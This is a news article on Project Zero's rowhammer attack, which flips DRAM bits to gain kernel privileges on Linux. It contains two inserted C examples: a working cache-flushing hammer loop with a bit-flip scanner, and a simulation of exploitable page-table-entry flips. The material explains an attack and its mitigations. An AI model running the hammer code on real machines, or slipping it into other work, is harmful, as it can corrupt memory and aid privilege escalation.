'Rowhammer' attack flips bits in memory to root Linux

Ouch! Google crocks capacitors and deviates DRAM to take control of the kernel

Last summer Google gathered a bunch of leet security researchers as its Project Zero team and instructed them to find unusual zero-day flaws. They've had plenty of success on the software front – but on Monday announced a hardware hack that's a real doozy.

The technique, dubbed "rowhammer", hammers DRAM with rapid, repeated accesses until the charge in neighbouring cells' capacitors leaks away, and the resulting bit errors can be exploited to take control of the system. By repeatedly activating (opening and closing) one row of DRAM cells, bits in a physically adjacent row can be flipped before the memory's periodic refresh restores them, corrupting whatever data is stored there. Plain reads are enough to do the hammering, provided the attacker flushes the addresses from the CPU caches so that every access really reaches DRAM.
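The hammer loop just described, written out as an added example (this is not the Project Zero test code). It assumes an x86 CPU, where the `clflush` instruction (reached here through `_mm_clflush`) evicts a cache line so the next load goes to DRAM; on other architectures the flush compiles to a no-op and the loop only exercises the cache. The function names `hammer` and `scan_for_flips`, the 0xFF fill pattern and the blind choice of address pairs are this example's own choices.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#if defined(__x86_64__) || defined(__i386__)
#include <emmintrin.h>          /* _mm_clflush */
#endif

/* Evict one cache line from every level so the next load is served from
   DRAM. Without this the CPU would answer from cache and the row would
   never be re-activated. Assumption: x86 with clflush; elsewhere a no-op. */
static inline void flush_line(const void *p)
{
#if defined(__x86_64__) || defined(__i386__)
    _mm_clflush(p);
#else
    (void)p;
#endif
}

/* The hammer loop: alternately load two addresses and flush them, so each
   iteration re-opens (activates) the DRAM row behind each address. If a and
   b map to different rows of the same bank, rows in between are disturbed. */
void hammer(volatile const uint8_t *a, volatile const uint8_t *b, unsigned long iters)
{
    for (unsigned long i = 0; i < iters; i++) {
        (void)*a;
        (void)*b;
        flush_line((const void *)a);
        flush_line((const void *)b);
    }
}

/* Compare a buffer against the pattern it was filled with, report every
   changed byte and return the total number of flipped bits. */
size_t scan_for_flips(const uint8_t *buf, size_t len, uint8_t pattern)
{
    size_t flips = 0;
    for (size_t i = 0; i < len; i++) {
        uint8_t diff = buf[i] ^ pattern;
        if (diff) {
            printf("bit flip at offset 0x%zx: 0x%02x -> 0x%02x\n", i, pattern, buf[i]);
            flips += (size_t)__builtin_popcount(diff);
        }
    }
    return flips;
}

/* Stand-alone run: fill a large buffer with 0xFF, hammer a few random
   page-aligned address pairs (virtual addresses do not reveal the physical
   row layout, so pairs are picked blindly) and then look for flipped bits. */
int main(void)
{
    const size_t len = 256u << 20;          /* 256 MiB */
    const uint8_t pattern = 0xFF;
    uint8_t *buf = malloc(len);
    if (!buf) return 1;
    memset(buf, pattern, len);
    srand(1);
    for (int round = 0; round < 16; round++) {
        size_t off_a = ((size_t)rand() % (len / 4096)) * 4096;
        size_t off_b = ((size_t)rand() % (len / 4096)) * 4096;
        hammer(buf + off_a, buf + off_b, 2000000UL);
    }
    printf("flipped bits: %zu\n", scan_for_flips(buf, len, pattern));
    free(buf);
    return 0;
}
```

On a machine that is not susceptible the scan reports zero flips no matter how long it runs; on a susceptible one the first flips typically appear only after many millions of activations, and only for pairs that happen to share a bank, which is why a real test runs for minutes rather than seconds.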

This corruption can cause the wrong instructions to be executed, or alter the control structures that govern how memory is assigned to programs; the latter can be used by an ordinary, unprivileged program to gain kernel-level privileges.

The Project Zero team has now built two working exploits: one escapes the Native Client (NaCl) sandbox, the other gains kernel privileges on x86-64 Linux from an unprivileged process. The team says the same approach should work against other operating systems.

The proof-of-concept exploit code flips bits in RAM to alter a page table entry belonging to the attacking process, so that one of its pages maps one of its own page tables; once it can write its own page tables, it can map and access all physical RAM, including the kernel's. From this point, memory protection mechanisms and other security measures can be bypassed, and structures within the operating system tampered with to take over the machine.

"One exploit uses rowhammer-induced bit flips to gain kernel privileges on x86-64 Linux when run as an unprivileged userland process," the team reports.

"When run on a machine vulnerable to the rowhammer problem, the process was able to induce bit flips in page table entries (PTEs). It was able to use this to gain write access to its own page table, and hence gain read-write access to all of physical memory."
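The page-table step in that description, modelled as an added example rather than Project Zero's exploit. The PTE bit layout (present, writable, user bits and the physical frame number in bits 12 to 51) is the real x86-64 format; the model of physical memory, the `spray` layout that puts one page-table frame at the start of every 2 MiB group, and the helper names `classify_flip` and `count_exploitable_flips` are assumptions of this example. It shows why a random one-bit flip inside a PTE has a usable chance of pointing the page at a page table once the process has mapped enough memory.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* x86-64 4 KiB page-table entry layout (the real hardware format). */
#define PTE_PRESENT  (1ULL << 0)
#define PTE_WRITE    (1ULL << 1)
#define PTE_USER     (1ULL << 2)
#define PTE_PFN_MASK 0x000FFFFFFFFFF000ULL    /* bits 12..51: physical frame number */

/* Simulated physical memory: what each 4 KiB frame currently holds. */
enum frame_kind { FRAME_FREE = 0, FRAME_USER_DATA, FRAME_PAGE_TABLE, FRAME_KERNEL };

uint64_t make_pte(uint64_t pfn)
{
    return (pfn << 12) | PTE_PRESENT | PTE_WRITE | PTE_USER;
}

uint64_t pte_pfn(uint64_t pte)
{
    return (pte & PTE_PFN_MASK) >> 12;
}

/* After a flip the mapping is only useful to the attacker if the page is
   still present, writable and user-accessible; a flip in the flag bits
   usually just breaks the mapping instead. */
bool pte_usable(uint64_t pte)
{
    const uint64_t need = PTE_PRESENT | PTE_WRITE | PTE_USER;
    return (pte & need) == need;
}

/* Flip one bit of a PTE and classify where the mapping now points.
   Returns the frame_kind of the new target, or -1 if the PTE became
   unusable or now points outside simulated RAM. */
int classify_flip(uint64_t pte, unsigned bit, const enum frame_kind *frames, uint64_t nframes)
{
    uint64_t flipped = pte ^ (1ULL << bit);
    if (!pte_usable(flipped))
        return -1;
    uint64_t pfn = pte_pfn(flipped);
    if (pfn >= nframes)
        return -1;
    return (int)frames[pfn];
}

/* Model of the spray: the process mmap()s a huge writable region, so RAM
   fills with user data frames plus one page-table frame per 512 data pages
   (one page table covers 2 MiB). Assumption of this example: the kernel
   places each PT frame at the start of its 2 MiB group; a real allocator
   interleaves them less regularly. Returns the number of PT frames. */
uint64_t spray(enum frame_kind *frames, uint64_t nframes)
{
    uint64_t page_tables = 0;
    for (uint64_t pfn = 0; pfn < nframes; pfn++) {
        if (pfn % 512 == 0) {
            frames[pfn] = FRAME_PAGE_TABLE;
            page_tables++;
        } else {
            frames[pfn] = FRAME_USER_DATA;
        }
    }
    return page_tables;
}

/* Count the (data PTE, PFN bit) pairs for which a single flip would map the
   user page onto a page table: exactly the flips that hand the process
   write access to its own page tables. pfn_bits limits which PFN bits are
   considered (bit 12 upwards). */
uint64_t count_exploitable_flips(const enum frame_kind *frames, uint64_t nframes, unsigned pfn_bits)
{
    uint64_t hits = 0;
    for (uint64_t pfn = 0; pfn < nframes; pfn++) {
        if (frames[pfn] != FRAME_USER_DATA)
            continue;
        uint64_t pte = make_pte(pfn);
        for (unsigned b = 12; b < 12 + pfn_bits; b++)
            if (classify_flip(pte, b, frames, nframes) == FRAME_PAGE_TABLE)
                hits++;
    }
    return hits;
}

int main(void)
{
    const uint64_t nframes = 1ULL << 18;       /* 1 GiB of simulated RAM */
    enum frame_kind *frames = calloc(nframes, sizeof *frames);
    if (!frames) return 1;
    uint64_t pts = spray(frames, nframes);
    uint64_t hits = count_exploitable_flips(frames, nframes, 18);
    printf("%llu page-table frames; %llu of %llu single-bit PFN flips land on a page table\n",
           (unsigned long long)pts, (unsigned long long)hits,
           (unsigned long long)(nframes - pts) * 18);
    free(frames);
    return 0;
}
```

A real exploit does not rely on luck in the other direction: it first finds which addresses and bit positions flip repeatably, then arranges for a page table entry to occupy that location before hammering again, which is why the attack needs the process to map large amounts of memory. The model above only quantifies the first half of that, the chance that a flipped PFN bit lands on a page-table frame.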

The team tested 29 x86 laptops built between 2010 and 2014 and using DDR3 DRAM. On 15 of them it was able to induce bit flips, and found that DRAM from a variety of memory manufacturers is susceptible to the attack.

Despite that rate of success on laptops, the team saw almost no bit flips on the desktop machines it tested. One possible explanation is that those machines used error-correcting (ECC) memory, which corrects single-bit errors and makes a rowhammer attack on the kernel much harder to pull off; another is that laptops use denser, lower-power RAM that is easier to disturb.

Successful attacks against servers – particularly ones that cut corners with their RAM – are not impossible.

"There are some cheap hosting environments where this is possible, running cheap servers without ECC memory, with separate user accounts instead of using virtual machines," explained Rob Graham from Errata Security. "However, such environments tend to be so riddled with holes that there are likely easier routes to exploitation than this one."

The Google team also said that, on one of the laptops, a newer BIOS version changed how the firmware configures the CPU's memory controller, apparently raising the DRAM refresh rate to blunt rowhammer. Refreshing rows more often narrows the window in which leaked charge can flip a bit, and the time needed to induce a flip rose from about five minutes to 40, but the system still fell.

The team has released code on GitHub that can be used to test Linux and Mac OS X systems for the vulnerability, and has set up a mailing list for researchers to expand on its results. ®
